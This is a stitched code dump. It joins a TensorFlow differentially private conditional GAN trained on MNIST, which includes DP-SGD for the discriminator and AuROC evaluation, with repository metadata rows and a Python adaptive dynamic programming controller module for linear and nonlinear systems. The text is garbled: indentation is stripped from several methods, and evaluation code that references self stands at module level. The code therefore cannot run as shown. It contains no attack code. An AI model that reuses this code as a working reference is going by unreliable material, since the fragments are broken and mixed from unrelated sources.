        """Conditional discriminator D(x, y).

        The one-hot label y is broadcast to a 1x1 spatial map and concatenated
        to x channel-wise before the conv stack.  Returns a triple:
        (sigmoid probability, pre-sigmoid logit, penultimate feature vector).
        Set reuse=True when rebuilding the scope for a second input (fake data).
        """
        # Network Architecture is exactly same as in infoGAN (https://arxiv.org/abs/1606.03657)
        # Architecture : (64)4c2s-(128)4c2s_BL-FC1024_BL-FC1_S
        with tf.variable_scope("discriminator", reuse=reuse):
            # merge image and label
            y = tf.reshape(y, [self.batch_size, 1, 1, self.y_dim])
            x = conv_cond_concat(x, y)
            net = lrelu(conv2d(x, 64, 4, 4, 2, 2, name='d_conv1'))
            net = lrelu(bn(conv2d(net, 128, 4, 4, 2, 2, name='d_conv2'), is_training=is_training, scope='d_bn2'))
            net = tf.reshape(net, [self.batch_size, -1])
            net = lrelu(bn(linear(net, 1024, scope='d_fc3'), is_training=is_training, scope='d_bn3'))
            out_logit = linear(net, 1, scope='d_fc4')
            out = tf.nn.sigmoid(out_logit)
            return out, out_logit, net
    def generator(self, z, y, is_training=True, reuse=False):
        """Conditional generator G(z, y) -> batch of 28x28x1 images in [0, 1].

        The noise vector z is concatenated with the one-hot label y, expanded
        through two FC layers, then upsampled 7x7 -> 14x14 -> 28x28 by two
        transposed convolutions.  Set reuse=True for the eval-time rebuild.
        """
        # Network Architecture is exactly same as in infoGAN (https://arxiv.org/abs/1606.03657)
        # Architecture : FC1024_BR-FC7x7x128_BR-(64)4dc2s_BR-(1)4dc2s_S
        with tf.variable_scope("generator", reuse=reuse):
            # merge noise and label
            z = concat([z, y], 1)
            net = tf.nn.relu(bn(linear(z, 1024, scope='g_fc1'), is_training=is_training, scope='g_bn1'))
            net = tf.nn.relu(bn(linear(net, 128 * 7 * 7, scope='g_fc2'), is_training=is_training, scope='g_bn2'))
            net = tf.reshape(net, [self.batch_size, 7, 7, 128])
            net = tf.nn.relu(bn(deconv2d(
                net, [self.batch_size, 14, 14, 64], 4, 4, 2, 2, name='g_dc3'),
                is_training=is_training, scope='g_bn3'))
            out = tf.nn.sigmoid(deconv2d(net, [self.batch_size, 28, 28, 1], 4, 4, 2, 2, name='g_dc4'))
            return out
    def build_model(self):
        """Wire the full training graph: placeholders, GAN losses, a DP
        optimizer for D, a plain Adam optimizer for G, an eval-time generator,
        and TensorBoard summaries.

        Note: only the discriminator is trained with differential privacy
        (per-example losses + clipping + noise); the generator sees the real
        data only through D, so it can use a standard optimizer.
        """
        # some parameters
        image_dims = [self.input_height, self.input_width, self.c_dim]
        bs = self.batch_size
        """ Graph Input """
        # images
        self.inputs = tf.placeholder(tf.float32, [bs] + image_dims, name='real_images')
        # labels
        self.y = tf.placeholder(tf.float32, [bs, self.y_dim], name='y')
        # noises
        self.z = tf.placeholder(tf.float32, [bs, self.z_dim], name='z')
        """ Loss Function """
        # output of D for real images
        D_real, D_real_logits, _ = self.discriminator(self.inputs, self.y, is_training=True, reuse=False)
        # output of D for fake images
        G = self.generator(self.z, self.y, is_training=True, reuse=False)
        D_fake, D_fake_logits, _ = self.discriminator(G, self.y, is_training=True, reuse=True)
        # get loss for discriminator: the *_vec tensors keep per-example
        # losses (needed by the DP optimizer's microbatching); the scalar
        # means are used for logging/summaries only.
        d_loss_real = tf.reduce_mean(
            tf.nn.sigmoid_cross_entropy_with_logits(logits=D_real_logits, labels=tf.ones_like(D_real)))
        d_loss_real_vec = tf.nn.sigmoid_cross_entropy_with_logits(logits=D_real_logits, labels=tf.ones_like(D_real))
        d_loss_fake = tf.reduce_mean(
            tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake_logits, labels=tf.zeros_like(D_fake)))
        d_loss_fake_vec = tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake_logits, labels=tf.zeros_like(D_fake))
        self.d_loss_real = d_loss_real
        self.d_loss_fake = d_loss_fake
        self.d_loss = self.d_loss_real + self.d_loss_fake
        self.d_loss_real_vec = d_loss_real_vec
        self.d_loss_fake_vec = d_loss_fake_vec
        # get loss for generator (non-saturating: G wants D(fake) -> 1)
        self.g_loss = tf.reduce_mean(
            tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake_logits, labels=tf.ones_like(D_fake)))
        """ Training """
        # divide trainable variables into a group for D and a group for G
        t_vars = tf.trainable_variables()
        d_vars = [var for var in t_vars if 'd_' in var.name]
        g_vars = [var for var in t_vars if 'g_' in var.name]
        # optimizers (run after batch-norm moving-average update ops)
        with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
            # DP-SGD for D: clips per-example gradients to `clipping` and adds
            # Gaussian noise scaled by `sigma`; privacy cost is charged to the
            # shared accountant.
            d_optim_init = base_dp_optimizer.DPGradientDescentGaussianOptimizer(
                self.accountant,
                l2_norm_clip=self.clipping,
                noise_multiplier=self.sigma,
                num_microbatches=self.batch_size,
                learning_rate=self.learning_rate)
            global_step = tf.train.get_global_step()
            self.d_optim = d_optim_init.minimize(
                d_loss_real=d_loss_real_vec,
                d_loss_fake=d_loss_fake_vec,
                global_step=global_step,
                var_list=d_vars)
            # Plain Adam for G at 125x the D learning rate.
            g_optim_init = tf.train.AdamOptimizer(
                self.learning_rate * 125,
                beta1=self.beta1)
            self.g_optim = g_optim_init.minimize(
                self.g_loss,
                var_list=g_vars)
        """" Testing """
        # for test: same generator weights, inference-mode batch norm
        self.fake_images = self.generator(
            self.z,
            self.y,
            is_training=False,
            reuse=True)
        """ Summary """
        d_loss_real_sum = tf.summary.scalar("d_loss_real", d_loss_real)
        d_loss_fake_sum = tf.summary.scalar("d_loss_fake", d_loss_fake)
        d_loss_sum = tf.summary.scalar("d_loss", self.d_loss)
        g_loss_sum = tf.summary.scalar("g_loss", self.g_loss)
        # final summary operations
        self.g_sum = tf.summary.merge([d_loss_fake_sum, g_loss_sum])
        self.d_sum = tf.summary.merge([d_loss_real_sum, d_loss_sum])
def train(self):
"""Run DP-GAN training until the epoch budget or the (epsilon, delta) privacy budget is exhausted."""
# initialize all variables
tf.global_variables_initializer().run()
# graph inputs for visualize training results
self.sample_z = np.random.uniform(-1, 1, size=(self.batch_size, self.z_dim))
self.test_labels = self.data_y[0:self.batch_size]
# saver to save model
self.saver = tf.train.Saver()
start_epoch = 0
counter = 1
should_terminate = False
epoch = start_epoch
while epoch < self.epoch:
idx = 0
#print("epoch : " + str(epoch))
while (not should_terminate and idx < self.num_batches):
# NOTE(review): mini-batches are taken in a fixed order every epoch (no shuffling).
batch_images = self.data_X[idx * self.batch_size:(idx + 1) * self.batch_size]
batch_labels = self.data_y[idx * self.batch_size:(idx + 1) * self.batch_size]
batch_z = np.random.uniform(-1, 1, [self.batch_size, self.z_dim]).astype(np.float32)
# update D network
_, d_loss, _ = self.sess.run(
[self.d_optim, self.d_loss_real_vec, self.d_loss_fake_vec],
feed_dict={self.inputs: batch_images, self.y: batch_labels, self.z: batch_z})
# update G network
_, summary_str, g_loss = self.sess.run(
[self.g_optim, self.g_sum, self.g_loss],
feed_dict={self.y: batch_labels, self.z: batch_z})
# Flag to terminate based on target privacy budget
terminate_spent_eps_delta = self.accountant.get_privacy_spent(
self.sess,
target_eps=[max(self.epsilon)])[0]
# For the Moments accountant, we should always have spent_eps == max_target_eps.
if (terminate_spent_eps_delta.spent_delta > self.delta or
terminate_spent_eps_delta.spent_eps > max(self.epsilon)):
# privacy budget exhausted: report, force the outer loop to stop, and bail out
should_terminate = True
print("epoch : " + str(epoch))
print("TERMINATE!!! Run out of privacy budget ...")
spent_eps_deltas = self.accountant.get_privacy_spent(self.sess, target_eps=self.epsilon)
print("Spent Eps and Delta : " + str(spent_eps_deltas))
epoch = self.epoch
break
if (idx % 100 == 0):
# every 100 batches, dump a grid of generator samples for visual inspection
samples = self.sess.run(
self.fake_images,
feed_dict={self.z: self.sample_z, self.y: self.test_labels})
tot_num_samples = min(self.sample_num, self.batch_size)
manifold_h = int(np.floor(np.sqrt(tot_num_samples)))
manifold_w = int(np.floor(np.sqrt(tot_num_samples)))
save_images(
samples[:manifold_h * manifold_w, :, :, :],
[manifold_h, manifold_w],
check_folder(self.result_dir + self.model_dir)\
+ self.model_name\
+ '_train_{:02d}_{:04d}.png'.format(epoch, idx))
idx += 1
# show temporal results
self.visualize_results(epoch)
epoch += 1
# compute ROC
def compute_fpr_tpr_roc(Y_test, Y_score):
    """Compute per-class and micro-averaged ROC curves and AUC scores.

    Y_test:  binarized ground-truth labels, shape (n_samples, n_classes).
    Y_score: predicted class probabilities, same shape.
    Returns (false_positive_rate, true_positive_rate, roc_auc) dicts keyed by
    class index, plus the special key "micro" for the micro-average.
    """
    false_positive_rate = {}
    true_positive_rate = {}
    roc_auc = {}
    for cls in range(Y_score.shape[1]):
        fpr_cls, tpr_cls, _ = roc_curve(Y_test[:, cls], Y_score[:, cls])
        false_positive_rate[cls] = fpr_cls
        true_positive_rate[cls] = tpr_cls
        roc_auc[cls] = auc(fpr_cls, tpr_cls)
    # Micro-average: pool every (sample, class) decision into a single curve.
    fpr_micro, tpr_micro, _ = roc_curve(Y_test.ravel(), Y_score.ravel())
    false_positive_rate["micro"] = fpr_micro
    true_positive_rate["micro"] = tpr_micro
    roc_auc["micro"] = auc(fpr_micro, tpr_micro)
    return false_positive_rate, true_positive_rate, roc_auc
def classify(X_train, Y_train, X_test, classiferName, random_state_value=0):
    """Fit a one-vs-rest classifier chosen by short name and return class probabilities for X_test."""
    # Lazily-constructed base estimators, keyed by the short names used by callers.
    builders = {
        "svm": lambda: svm.SVC(kernel='linear', probability=True, random_state=random_state_value),
        "dt": lambda: DecisionTreeClassifier(random_state=random_state_value),
        "lr": lambda: LogisticRegression(solver='lbfgs', multi_class='multinomial',
                                         random_state=random_state_value),
        "rf": lambda: RandomForestClassifier(n_estimators=100, random_state=random_state_value),
        "gnb": lambda: GaussianNB(),
        "bnb": lambda: BernoulliNB(alpha=.01),
        "ab": lambda: AdaBoostClassifier(random_state=random_state_value),
        "mlp": lambda: MLPClassifier(random_state=random_state_value, alpha=1),
    }
    if classiferName not in builders:
        print("Classifier not in the list!")
        exit()
    classifier = OneVsRestClassifier(builders[classiferName]())
    # predict_proba gives per-class scores suitable for ROC computation.
    Y_score = classifier.fit(X_train, Y_train).predict_proba(X_test)
    return Y_score
# Evaluate the trained generator: synthesize a labeled data set, train a downstream
# classifier on it, and report micro-averaged AuROC against the real MNIST test set.
batch_size = int(self.batch_size)
# Synthetic samples to draw per digit class (mirrors the MNIST train-set class counts);
# class 0 is reduced by one batch because its first batch is generated before the loop.
n_class = np.zeros(10)
n_class[0] = 5923 - batch_size
n_class[1] = 6742
n_class[2] = 5958
n_class[3] = 6131
n_class[4] = 5842
n_class[5] = 5421
n_class[6] = 5918
n_class[7] = 6265
n_class[8] = 5851
n_class[9] = 5949
# Seed the sample buffers with one batch of class 0 so np.append has something to extend.
Z_sample = np.random.uniform(-1, 1, size=(batch_size, self.z_dim))
y = np.zeros(batch_size, dtype=np.int64) + 0
y_one_hot = np.zeros((batch_size, self.y_dim))
y_one_hot[np.arange(batch_size), y] = 1
images = self.sess.run(self.fake_images, feed_dict={self.z: Z_sample, self.y: y_one_hot})
for classLabel in range(0, 10):
    for _ in range(0, int(n_class[classLabel]), batch_size):
        Z_sample = np.random.uniform(-1, 1, size=(batch_size, self.z_dim))
        y = np.zeros(batch_size, dtype=np.int64) + classLabel
        y_one_hot_init = np.zeros((batch_size, self.y_dim))
        y_one_hot_init[np.arange(batch_size), y] = 1
        images = np.append(images, self.sess.run(self.fake_images,
                           feed_dict={self.z: Z_sample, self.y: y_one_hot_init}), axis=0)
        y_one_hot = np.append(y_one_hot, y_one_hot_init, axis=0)
X_test, Y_test = loadlocal_mnist(images_path=self.base_dir + 'mnist/t10k-images.idx3-ubyte',
                                 labels_path=self.base_dir + 'mnist/t10k-labels.idx1-ubyte')
Y_test = [int(y) for y in Y_test]
classes = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
Y_test = label_binarize(Y_test, classes=classes)
print("Classifying - Logistic Regression ... ")
# Flatten each image into a feature row. Fixed: the original used reshape(n, -2);
# only -1 is documented by numpy as the "infer this dimension" marker.
TwoDim_images = images.reshape(np.shape(images)[0], -1)
Y_score = classify(TwoDim_images, y_one_hot, X_test, "lr", random_state_value=30)
false_positive_rate, true_positive_rate, roc_auc = compute_fpr_tpr_roc(Y_test, Y_score)
print("AuROC: " + str(roc_auc["micro"]))
classification_results_fname = self.base_dir + "/Results/Base_DP_CGAN_AuROC.txt"
# Context manager so the results file is flushed and closed even on error
# (the original handle was never closed). NOTE(review): mode "w" truncates the file
# each run despite the separator line suggesting an appended history -- confirm intent.
# NOTE(review): the "{:d}" field assumes self.epsilon holds ints -- confirm.
with open(classification_results_fname, "w") as classification_results:
    classification_results.write("\nepsilon : {:d}, sigma: {:.2f}, clipping value: {:.2f}".format(
        max(self.epsilon),
        round(self.sigma,2),
        round(self.clipping,2)))
    classification_results.write("\nAuROC: " + str(roc_auc["micro"]))
    classification_results.write("\n------------------------------------------------------------------------------------\n")
def visualize_results(self, epoch):
"""Save three kinds of sample grids for this epoch: random labels, one grid per class,
and a style-consistency canvas built from the same noise rows across all classes."""
tot_num_samples = min(self.sample_num, self.batch_size)
image_frame_dim = int(np.floor(np.sqrt(tot_num_samples)))
""" random condition, random noise """
y = np.random.choice(self.y_dim, self.batch_size)
y_one_hot = np.zeros((self.batch_size, self.y_dim))
y_one_hot[np.arange(self.batch_size), y] = 1
z_sample = np.random.uniform(-1, 1, size=(self.batch_size, self.z_dim))
samples = self.sess.run(self.fake_images, feed_dict={self.z: z_sample, self.y: y_one_hot})
save_images(samples[:image_frame_dim * image_frame_dim, :, :, :], [image_frame_dim, image_frame_dim],
check_folder(
self.result_dir + '/' + self.model_dir) + '/' + self.model_name + '_epoch%03d' % epoch + '_test_all_classes.png')
""" specified condition, random noise """
n_styles = 10 # must be less than or equal to self.batch_size
np.random.seed()
si = np.random.choice(self.batch_size, n_styles)
for l in range(self.y_dim):
y = np.zeros(self.batch_size, dtype=np.int64) + l
y_one_hot = np.zeros((self.batch_size, self.y_dim))
y_one_hot[np.arange(self.batch_size), y] = 1
# the same z_sample is reused for every class, so the noise "styles" line up across classes
samples = self.sess.run(self.fake_images, feed_dict={self.z: z_sample, self.y: y_one_hot})
save_images(samples[:image_frame_dim * image_frame_dim, :, :, :], [image_frame_dim, image_frame_dim],
check_folder(
self.result_dir + '/' + self.model_dir) + '/' + self.model_name + '_epoch%03d' % epoch + '_test_class_%d.png' % l)
samples = samples[si, :, :, :]
if l == 0:
all_samples = samples
else:
all_samples = np.concatenate((all_samples, samples), axis=0)
""" save merged images to check style-consistency """
# transpose the class-major sample stack into a style-major canvas (rows = styles, cols = classes)
canvas = np.zeros_like(all_samples)
for s in range(n_styles):
for c in range(self.y_dim):
canvas[s * self.y_dim + c, :, :, :] = all_samples[c * n_styles + s, :, :, :]
save_images(canvas, [n_styles, self.y_dim],
check_folder(
self.result_dir + '/' + self.model_dir) + '/' + self.model_name + '_epoch%03d' % epoch + '_test_all_classes_style_by_style.png')
@property
def model_dir(self):
    """Folder name encoding this run's configuration: Train_<model>_<dataset>_<batch>_<delta>."""
    parts = (self.model_name, self.dataset_name, self.batch_size, self.delta)
    return "Train_{}_{}_{}_{}".format(*parts)
| [
"reihaneh.torkzadehmahani@gmail.com"
] | reihaneh.torkzadehmahani@gmail.com |
03fbbd024ace79d6db60da0d6fa7e50fac2b92b8 | 12094b02c411f986e8f66f1f971f8e3ae99a8167 | /OpenControl/ADP_control/controller.py | feeb8be9b624ea12d776d1409e3dbf353b7a66ee | [
"MIT"
] | permissive | masbudisulaksono/OpenControl | f8fcbe63290a0011f3ea7412a0200ca9f8913ec9 | 0087408c57bc77f34f524b28f8c4363b116700bb | refs/heads/master | 2023-06-22T09:57:54.579445 | 2021-07-16T05:10:59 | 2021-07-16T05:10:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,122 | py | import numpy as np
from scipy import integrate
from control import lqr
from ..visualize import Logger
from .system import LTI,NonLin
class LTIController():
"""Continuous-time adaptive (ADP) controller for an LTI system.
Attributes:
system (LTI class): the object of LTI class
log_dir (string, optional): the folder include all log files. Defaults to 'results'.
logX (Logger class): the object of Logger class, use for logging state signals
K0 (mxn array, optional): The initial value of K matrix. Defaults to np.zeros((m,n)).
Q (nxn array, optional): The Q matrix. Defaults to 1.
R (mxm array, optional): The R matrix. Defaults to 1.
data_eval (float, optional): data_eval x num_data = time interval for each policy updation. Defaults to 0.1.
num_data (int, optional): the number of data for each learning iteration. Defaults to 10.
explore_noise (func(t), optional): The exploration noise within the learning stage. Defaults to lambda t:2*np.sin(100*t).
logK (Logger class): logger of the K matrix
logP (Logger class): logger of the P matrix
t_plot, x_plot (float, array): use for logging, plotting simulation result
viz (boolean): True for visualize results on ``Tensorboard``. Default to True
"""
def __init__(self, system, log_dir='results'):
"""Design a controller for the system input.
Args:
system (LTI class): Call this class after system.setSimulationParams()
log_dir (string, optional): the folder include all log files. Defaults to 'results'.
"""
self.system = system
self.model = system.model
# cache the state-space matrices and the (n, m) dimension tuple from the model dict
self.A = self.model['A']
self.B = self.model['B']
self.dimension = self.model['dimension']
self.log_dir = log_dir
# state-trajectory logger (Tensorboard-backed)
self.logX = Logger(log_dir=log_dir)
def step(self, x0, u, t_span):
    """Integrate the closed-loop LTI dynamics over one interval.

    Args:
        x0 (1D array): initial state for the interval.
        u (callable): feedback law u(t, x) returning the input vector.
        t_span (tuple): (t_start, t_stop).

    Returns:
        (1D array, 2D array): solver time points and the states at them (rows are time points).
    """
    def closed_loop(t, x):
        # dx/dt = A x + B u(t, x)
        return self.A.dot(x) + self.B.dot(u(t, x))
    solution = integrate.solve_ivp(fun=closed_loop, y0=x0, t_span=t_span,
                                   method=self.system.algo,
                                   max_step=self.system.max_step,
                                   dense_output=True)
    return solution.t, solution.y.T
def LQR(self, Q=None, R=None):
    """Solve the continuous-time LQR problem for (A, B).

    Args:
        Q (nxn array, optional): state weight matrix. Defaults to identity.
        R (mxm array, optional): input weight matrix. Defaults to identity.

    Returns:
        (mxn array, nxn array): the optimal gain K and the Riccati solution P.
    """
    # `is None` instead of `np.all(Q == None)`: identity is the intended check, and
    # elementwise comparison of an array with None is a deprecated numpy behavior.
    if Q is None:
        Q = np.eye(self.A.shape[0])
    if R is None:
        R = np.eye(self.B.shape[1])
    # control.lqr returns (K, S, E): gain, Riccati solution, closed-loop eigenvalues.
    K, P, E = lqr(self.A, self.B, Q, R)
    return K, P
def _isStable(self, A):
eig = np.linalg.eig(A)[0].real
return np.all(eig<0)
def onPolicy(self, stop_thres=1e-3, viz=True):
"""Using On-policy approach to find optimal adaptive feedback controller, requires only the dimension of the system
Args:
stop_thres (float, optional): threshold value to stop iteration. Defaults to 1e-3.
viz (bool, optional): True for logging data. Defaults to True.
Raises:
ValueError: raise when the user-defined number of data is not enough, make rank condition unsatisfied
Returns:
mxn array, nxn array: the optimal K, P matrix
"""
#online data collection
self.viz = viz
x_plot = [self.system.x0] # list of array
t_plot = [self.system.t_sim[0]]
save_P = []
save_K = [self.K0]
K = save_K[-1]
iter = 0
while t_plot[-1] < self.system.t_sim[1]:
# behavior policy: current gain plus exploration noise for persistent excitation
u = lambda t,x: -K.dot(x) + self.explore_noise(t)
theta = []
xi = []
# collect data_per_eval x data, iterate within an eval
for i in range(self.num_data):
x_sample = [x_plot[-1]]
t_sample = [t_plot[-1]]
t_collect = t_plot[-1]
# collect online data, iterate within a sample time
while t_plot[-1] < t_collect + self.data_eval:
t_temp, x_temp = self.step(x0=x_plot[-1], u=u, t_span=(t_plot[-1], t_plot[-1] + self.system.sample_time))
if self.viz:
self.logX.log('states_onPolicy', x_temp[-1], int(t_temp[-1]/self.system.sample_time))
x_sample.append(x_temp[-1])
t_sample.append(t_temp[-1])
x_plot.extend(x_temp[1:].tolist())
t_plot.extend(t_temp[1:].tolist())
# one least-squares row per data window
thetaRow, xiRow = self._rowGainOnPloicy(K, x_sample, t_sample)
theta.append(thetaRow)
xi.append(xiRow)
theta = np.array(theta)
xi = np.array(xi)
# check rank condition
n,m = self.dimension
# need at least n(n+1)/2 + mn independent rows to identify the symmetric P and the gain K
if np.linalg.matrix_rank(theta) < m*n + n*(n+1)/2:
print('not enough number of data, rank condition unsatisfied!')
raise ValueError
# solve P, K matrix
PK = np.linalg.pinv(theta).dot(xi)
P = PK[:n*n].reshape((n,n))
if self.viz:
self.logP.log('P_onPolicy', P, iter)
self.logK.log('K_onPolicy', K, iter)
save_P.append(P)
# check stopping criteria
try:
# needs two P iterates; the IndexError on the first pass is swallowed on purpose
err = np.linalg.norm(save_P[-1]-save_P[-2], ord=2)
if err < stop_thres:
# converged: finish the simulation with the learned gain, noise removed
self.t_plot, self.x_plot = self._afterGainKopt(t_plot, x_plot, K, 'states_onPolicy')
break
except: pass
K = PK[n*n:].reshape((n,m)).T
save_K.append(K)
iter += 1
return save_K[-1], save_P[-1]
def _afterGainKopt(self, t_plot, x_plot, Kopt, section):
    """Continue the simulation to t_sim[1] with the learned gain (exploration noise removed)."""
    # remove explore noise
    u = lambda t, x: -Kopt.dot(x)
    dt = self.system.sample_time
    remaining_steps = int((self.system.t_sim[1] - t_plot[-1]) / dt)
    for _ in range(remaining_steps):
        t_step, x_step = self.step(x0=x_plot[-1], u=u, t_span=(t_plot[-1], t_plot[-1] + dt))
        if self.viz:
            self.logX.log(section, x_step[-1], int(t_step[-1] / self.system.sample_time))
        x_plot.extend(x_step[1:].tolist())
        t_plot.extend(t_step[1:].tolist())
    return t_plot, x_plot
def _rowGainOnPloicy(self, K, x_sample, t_sample):
"""Build one regression row of the on-policy least-squares system from one data window.
Returns (_thetaRow, _xiRow) where the integrals are evaluated with Simpson quadrature
over the window's (possibly non-uniform) sample times."""
# difference of x kron x at the window boundaries
xx = np.kron(x_sample[-1], x_sample[-1]) - np.kron(x_sample[0], x_sample[0])
xeR = []
xQx = []
# Qk = Q + K^T R K: the stage cost under the current gain
Qk = self.Q + K.T.dot(self.R.dot(K))
# print(np.array(x_sample).shape)
for i, xi in enumerate(x_sample):
# print(type(xi))
xi = np.array(xi)
ei = self.explore_noise(t_sample[i])
xeR.append(np.kron(xi, np.dot(ei,(self.R)).squeeze()))
xQx.append(xi.dot(Qk.dot(xi)))
xeR = -2*integrate.simpson(xeR, t_sample, axis=0)
# xeR = -2*np.trapz(xeR, dx=sample_time, axis=0)
_thetaRow = np.hstack((xx, xeR))
_xiRow = -integrate.simpson(xQx, t_sample, axis=0)
# _xiRow = -np.trapz(xQx, dx=sample_time, axis=0)
return _thetaRow, _xiRow
def setPolicyParam(self, K0=None, Q=None, R=None, data_eval=0.1, num_data=10, explore_noise=lambda t: 2*np.sin(100*t)):
    """Setup policy parameters for both the On (Off) policy algorithms and initialize the K, P loggers.

    Args:
        K0 (mxn array, optional): initial stabilizing gain. Defaults to np.zeros((m, n)).
        Q (nxn array, optional): state weight matrix. Defaults to identity.
        R (mxm array, optional): input weight matrix. Defaults to identity.
        data_eval (float, optional): data_eval x num_data = time interval for each policy update. Defaults to 0.1.
        num_data (int, optional): the number of data windows per learning iteration. Defaults to 10.
        explore_noise (func(t), optional): exploration noise used while learning. Defaults to lambda t: 2*np.sin(100*t).

    Raises:
        ValueError: when the initial K0 is not admissible (A - B K0 is not Hurwitz).

    Note:
        - The K0 matrix must be admissible
        - data_eval must be larger than the sample_time
        - num_data >= n(n+1) + 2mn
    """
    # `is None` instead of `np.all(... == None)`: identity is the intended check, and
    # elementwise comparison of an array with None is a deprecated numpy behavior.
    if Q is None:
        Q = np.eye(self.A.shape[0])
    if R is None:
        R = np.eye(self.B.shape[1])
    if K0 is None:
        K0 = np.zeros(self.dimension).T
    if len(K0.shape) == 1:
        # accept a 1-D gain for single-input systems; promote to a 1 x n row matrix
        K0 = np.expand_dims(K0, axis=0)
    # check stable of K0: the initial policy must stabilize the plant
    if not self._isStable(self.A - self.B.dot(K0)):
        print('the inital K0 matrix is not stable, try re-initialize K0')
        raise ValueError
    self.K0 = K0
    self.Q = Q
    self.R = R
    self.data_eval = data_eval
    self.num_data = num_data
    self.explore_noise = explore_noise
    self.logK = Logger(log_dir=self.log_dir)
    self.logP = Logger(log_dir=self.log_dir)
def offPolicy(self, stop_thres=1e-3, max_iter=30, viz=True):
"""Using Off-policy approach to find optimal adaptive feedback controller, requires only the dimension of the system
Args:
stop_thres (float, optional): threshold value to stop iteration. Defaults to 1e-3.
viz (bool, optional): True for logging data. Defaults to True.
max_iter (int, optional): the maximum number of policy iterations. Defaults to 30.
Raises:
ValueError: raise when the user-defined number of data is not enough, make rank condition unsatisfied
Returns:
mxn array, nxn array: the optimal K, P matrix
"""
self.viz = viz
self.stop_thres = stop_thres
self.max_iter = max_iter
save_K = [self.K0]
save_P = []
x_plot = [self.system.x0] # list of array
t_plot = [self.system.t_sim[0]]
# behavior policy: fixed initial gain K0 plus exploration noise (data is collected once)
u = lambda t,x: -self.K0.dot(x) + self.explore_noise(t)
dxx = []
Ixx = []
Ixu = []
for i in range(self.num_data):
x_sample = [x_plot[-1]]
t_sample = [t_plot[-1]]
#collect data, iterate within data eval
t_collect = t_plot[-1]
while t_plot[-1] < t_collect + self.data_eval:
t_temp, x_temp = self.step(x0=x_plot[-1], u=u, t_span=(t_plot[-1], t_plot[-1] + self.system.sample_time))
if self.viz:
self.logX.log('states_offPolicy', x_temp[-1], int(t_temp[-1]/self.system.sample_time))
x_sample.append(x_temp[-1])
t_sample.append(t_temp[-1])
x_plot.extend(x_temp[1:].tolist())
t_plot.extend(t_temp[1:].tolist())
dxx_ , Ixx_, Ixu_ = self._getRowOffPolicyMatrix(t_sample, x_sample)
dxx.append(dxx_)
Ixx.append(Ixx_)
Ixu.append(Ixu_)
# check rank condition
test_matrix = np.hstack((Ixx, Ixu))
n,m = self.dimension
# need at least n(n+1)/2 + mn independent rows to identify the symmetric P and the gain K
if np.linalg.matrix_rank(test_matrix) < m*n + n*(n+1)/2:
print('not enough data, rank condition is not satisfied')
raise ValueError
# find optimal solution
save_K, save_P = self._policyEval(dxx, Ixx, Ixu)
self.Kopt = save_K[-1]
# finish the simulation to t_sim[1] under the learned gain, without exploration noise
self.t_plot, self.x_plot = self._afterGainKopt(t_plot, x_plot, self.Kopt, 'states_offPolicy')
# return optimal policy
return save_K[-1], save_P[-1]
def _policyEval(self, dxx, Ixx, Ixu):
"""Off-policy policy iteration: repeatedly solve (P, K) from the collected data
matrices until the P iterates converge or max_iter is reached.
Returns (save_K, save_P), the histories of the gain and value-matrix iterates."""
dxx = np.array(dxx) # n_data x (n_state^2)
Ixx = np.array(Ixx) # n_data x (n_state^2)
Ixu = np.array(Ixu) # n_data x (n_state*n_input)
save_K = [self.K0]
save_P = []
n,m = self.dimension
K = save_K[-1] # mxn
for i in range(self.max_iter):
# assemble the least-squares system: unknowns are vec(P) followed by mn gain-related entries
temp = -2*Ixx.dot(np.kron(np.eye(n), K.T.dot(self.R))) - 2*Ixu.dot(np.kron(np.eye(n), self.R))
theta = np.hstack((dxx, temp))
Qk = self.Q + K.T.dot(self.R.dot(K))
xi = -Ixx.dot(Qk.ravel())
PK = np.linalg.pinv(theta).dot(xi)
P = PK[:n*n].reshape((n,n))
if self.viz:
self.logP.log('P_offPolicy', P, i)
self.logK.log('K_offPolicy', K, i)
save_P.append(P)
# check stopping criteria
try:
# needs two P iterates; the IndexError on the first pass is swallowed on purpose
err = np.linalg.norm(save_P[-1] - save_P[-2], ord=2)
if err < self.stop_thres:
break
except: pass
K = PK[n*n:].reshape((n,m)).T
save_K.append(K)
return save_K, save_P
def _getRowOffPolicyMatrix(self, t_sample, x_sample):
u = lambda t,x: -self.K0.dot(x) + self.explore_noise(t)
dxx_ = np.kron(x_sample[-1], x_sample[-1]) - np.kron(x_sample[0], x_sample[0])
xx = []
xu = []
for i, xi in enumerate(x_sample):
xx.append(np.kron(xi, xi))
ui = u(t_sample[i], xi)
xu.append(np.kron(xi, ui))
Ixx_ = integrate.simpson(xx, t_sample, axis=0)
Ixu_ = integrate.simpson(xu, t_sample, axis=0)
return dxx_, Ixx_, Ixu_
class NonLinController():
"""Continuous-time adaptive (ADP) controller for a nonlinear system.
Attributes:
system (nonLin class): the object of nonLin class
log_dir (string, optional): the folder include all log files. Defaults to 'results'.
logX (Logger class): the object of Logger class, use for logging state signals
u0 (func(x), optional): The initial feedback control policy. Defaults to 0.
q_func (func(x), optional): the function :math:`q(x)`. Defaults to nonLinController.default_q_func.
R (mxm array, optional): The R matrix. Defaults to 1.
phi_func (list of func(x), optional): the sequences of basis function to approximate critic, :math:`\phi_j(x)`. Defaults to nonLinController.default_phi_func
psi_func (list of func(x), optional): the sequences of basis function to approximate actor, :math:`\psi_j(x)`. Defaults to nonLinController.default_psi_func
data_eval (float, optional): data_eval x num_data = time interval for each policy updation. Defaults to 0.1.
num_data (int, optional): the number of data for each learning iteration. Defaults to 10.
explore_noise (func(t), optional): The exploration noise within the learning stage. Defaults to lambda t:2*np.sin(100*t).
logWa (Logger class): logging to value of the weight of the actor
logWc (Logger class): logging to value of the weight of the critic
t_plot, x_plot (float, array): use for logging, plotting simulation result
viz (boolean): True for visualize results on ``Tensorboard``. Default to True
"""
def __init__(self, system, log_dir='results'):
"""Design a controller for the system
Args:
system (nonLin class): Call this class after system.setSimulationParams()
log_dir (string, optional): the folder include all log files. Defaults to 'results'.
"""
self.system = system
# dot_x(t, x, u): the system's ODE right-hand side, taken from the system object
self.dot_x = self.system.dot_x
self.log_dir = log_dir
# state-trajectory logger (Tensorboard-backed)
self.logX = Logger(log_dir=self.log_dir)
